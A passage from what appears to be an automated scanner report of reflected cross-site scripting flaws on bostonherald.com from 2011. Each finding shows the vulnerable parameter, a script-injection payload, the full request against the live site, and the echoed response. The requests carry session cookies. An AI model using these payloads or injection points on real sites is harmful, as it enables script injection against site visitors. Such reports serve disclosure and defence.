Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:40:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2143
Content-Type: text/html; charset=UTF-8
Connection: close

<style type="text/css">
/* div { top: 0px; } */
</style>


<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/Rea
...[SNIP]...
LING=no BORDERCOLOR="#000000" '+
'SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!x147107c</script><script>alert(1)</script>2ef88115157">
...[SNIP]...

4.789. http://www.bostonherald.com/includes/processAds.bg [position parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/includes/processAds.bg

Issue detail

The value of the position request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6b75"><script>alert(1)</script>72445af01e was submitted in the position parameter. This input was echoed as a6b75\"><script>alert(1)</script>72445af01e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/processAds.bg?position=x14a6b75"><script>alert(1)</script>72445af01e&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:40:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2101
Content-Type: text/html; charset=UTF-8
Connection: close

<style type="text/css">
/* div { top: 0px; } */
</style>


<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!x14a6b75\"><script>alert(1)</script>72445af01e">
...[SNIP]...

4.790. http://www.bostonherald.com/mediacenter/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/mediacenter/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b77b'-alert(1)-'44e32132f58 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mediacenter/?7b77b'-alert(1)-'44e32132f58=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:23:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 450978

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Photos & Video - Boston
...[SNIP]...
<script type="text/javascript">
            // For pop-up windows in Now Playing pane
            hide_id = 0;

            // Converts the GET params to a JSON object
               mcParams = '7b77b'-alert(1)-'44e32132f58=1'.toQueryParams();

               //alert(Object.inspect(mcParams));

               function updateData(key,val) {

                   // update paramaters JSON
                   mcParams[key] = val;

                   // Show loadi
...[SNIP]...

4.791. http://www.bostonherald.com/mediacenter/video.php [bc_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/mediacenter/video.php

Issue detail

The value of the bc_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59ff3"><script>alert(1)</script>0e6ae86ba81 was submitted in the bc_id parameter. This input was echoed as 59ff3\"><script>alert(1)</script>0e6ae86ba81 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20110127/012711snowar.flv&program_id=4c6ebfbed6269&media_id=2024&title=Sidewalk%20snow%20woes&width=370&height=300&bc_id=76678385900159ff3"><script>alert(1)</script>0e6ae86ba81&rand=408 HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:40:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2577
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
<object id="myExperience76678385900159ff3\"><script>alert(1)</script>0e6ae86ba81" class="BrightcoveExperience">
...[SNIP]...

4.792. http://www.bostonherald.com/mediacenter/video.php [height parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/mediacenter/video.php

Issue detail

The value of the height request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6d42"><script>alert(1)</script>dad1887e031 was submitted in the height parameter. This input was echoed as e6d42\"><script>alert(1)</script>dad1887e031 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20110127/012711snowar.flv&program_id=4c6ebfbed6269&media_id=2024&title=Sidewalk%20snow%20woes&width=370&height=300e6d42"><script>alert(1)</script>dad1887e031&bc_id=766783859001&rand=408 HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:40:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2577
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
<param name="height" value="300e6d42\"><script>alert(1)</script>dad1887e031" />
...[SNIP]...

4.793. http://www.bostonherald.com/mediacenter/video.php [media_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/mediacenter/video.php

Issue detail

The value of the media_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da509</script><script>alert(1)</script>08312a85049 was submitted in the media_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20110127/012711snowar.flv&program_id=4c6ebfbed6269&media_id=2024da509</script><script>alert(1)</script>08312a85049&title=Sidewalk snow woes&width=370&height=300&bc_id=766783859001&rand=408 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:01:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2639
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
se");

    tmObj.set("VideoURL", "http://www.bostonherald.com/mediacenter/retrieve_video.php?redirect=http%3A%2F%2Fmultimedia.bostonherald.com%2Fvideo%2F20110127%2F012711snowar.flv&video_id=2024da509</script><script>alert(1)</script>08312a85049");
tmObj.set("VideoTitle", "Sidewalk");
tmObj.set("Category", "");

           // Default slate image
           // http://cache.heraldinteractive.com/images/version5.0/site_images/click_to_pla
...[SNIP]...

4.794. http://www.bostonherald.com/mediacenter/video.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/mediacenter/video.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 521f5</script><script>alert(1)</script>224f4942aaa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20110127/012711snowar.flv&program_id=4c6ebfbed6269&media_id=2024&title=Side/521f5</script><script>alert(1)</script>224f4942aaawalk snow woes&width=370&height=300&bc_id=766783859001&rand=408 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:04:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2640
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
http://www.bostonherald.com/mediacenter/retrieve_video.php?redirect=http%3A%2F%2Fmultimedia.bostonherald.com%2Fvideo%2F20110127%2F012711snowar.flv&video_id=2024");
tmObj.set("VideoTitle", "Side/521f5</script><script>alert(1)</script>224f4942aaawalk");
tmObj.set("Category", "");

           // Default slate image
           // http://cache.heraldinteractive.com/images/version5.0/site_images/click_to_play.jpg

           tmObj.set("PreviewImageUR
...[SNIP]...

4.795. http://www.bostonherald.com/mediacenter/video.php [program_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/mediacenter/video.php

Issue detail

The value of the program_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73056</script><script>alert(1)</script>1e86b062507 was submitted in the program_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20110127/012711snowar.flv&program_id=4c6ebfbed626973056</script><script>alert(1)</script>1e86b062507&media_id=2024&title=Sidewalk snow woes&width=370&height=300&bc_id=766783859001&rand=408 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:01:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2689
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
ia.bostonherald.com/video/20110127/012711snowar.flv.jpg");
           tmObj.set("EndSlateURL","http://multimedia.bostonherald.com/video/20110127/012711snowar.flv.jpg");


           tmObj.start('4c6ebfbed626973056</script><script>alert(1)</script>1e86b062507'); // Set in Acudeo Console

           // 49ee2ce0476b3 -- incl bottom companion ad
</script>
...[SNIP]...

4.796. http://www.bostonherald.com/mediacenter/video.php [program_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/mediacenter/video.php

Issue detail

The value of the program_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc846"><script>alert(1)</script>a2e44a869d6 was submitted in the program_id parameter. This input was echoed as cc846\"><script>alert(1)</script>a2e44a869d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20110127/012711snowar.flv&program_id=4c6ebfbed6269cc846"><script>alert(1)</script>a2e44a869d6&media_id=2024&title=Sidewalk snow woes&width=370&height=300&bc_id=766783859001&rand=408 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:00:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2677
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/4c6ebfbed6269cc846\"><script>alert(1)</script>a2e44a869d6_p.js">
...[SNIP]...

4.797. http://www.bostonherald.com/mediacenter/video.php [src parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/mediacenter/video.php

Issue detail

The value of the src request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9aa21</script><script>alert(1)</script>b29dc7874f2 was submitted in the src parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20110127/012711snowar.flv9aa21</script><script>alert(1)</script>b29dc7874f2&program_id=4c6ebfbed6269&media_id=2024&title=Sidewalk snow woes&width=370&height=300&bc_id=766783859001&rand=408 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:00:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2759
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
image
           // http://cache.heraldinteractive.com/images/version5.0/site_images/click_to_play.jpg

           tmObj.set("PreviewImageURL","http://multimedia.bostonherald.com/video/20110127/012711snowar.flv9aa21</script><script>alert(1)</script>b29dc7874f2.jpg");
           tmObj.set("EndSlateURL","http://multimedia.bostonherald.com/video/20110127/012711snowar.flv9aa21</script>
...[SNIP]...

4.798. http://www.bostonherald.com/mediacenter/video.php [title parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/mediacenter/video.php

Issue detail

The value of the title request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b51c2</script><script>alert(1)</script>07de356f883 was submitted in the title parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20110127/012711snowar.flv&program_id=4c6ebfbed6269&media_id=2024&title=Sidewalkb51c2</script><script>alert(1)</script>07de356f883 snow woes&width=370&height=300&bc_id=766783859001&rand=408 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:02:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2639
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
p://www.bostonherald.com/mediacenter/retrieve_video.php?redirect=http%3A%2F%2Fmultimedia.bostonherald.com%2Fvideo%2F20110127%2F012711snowar.flv&video_id=2024");
tmObj.set("VideoTitle", "Sidewalkb51c2</script><script>alert(1)</script>07de356f883");
tmObj.set("Category", "");

           // Default slate image
           // http://cache.heraldinteractive.com/images/version5.0/site_images/click_to_play.jpg

           tmObj.set("PreviewImageURL","
...[SNIP]...

4.799. http://www.bostonherald.com/mediacenter/video.php [width parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/mediacenter/video.php

Issue detail

The value of the width request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e143d"><script>alert(1)</script>a9e85fd0010 was submitted in the width parameter. This input was echoed as e143d\"><script>alert(1)</script>a9e85fd0010 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:40:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2533
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
<div id="adCompanionSubstitute" class="w370e143d\"><script>alert(1)</script>a9e85fd0010xh300">
...[SNIP]...

4.800. http://www.bostonherald.com/news/politics/view.bg [format parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/politics/view.bg

Issue detail

The value of the format request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff39a'-alert(1)-'96f43005832 was submitted in the format parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /news/politics/view.bg?articleid=1312665&format=emailff39a'-alert(1)-'96f43005832 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

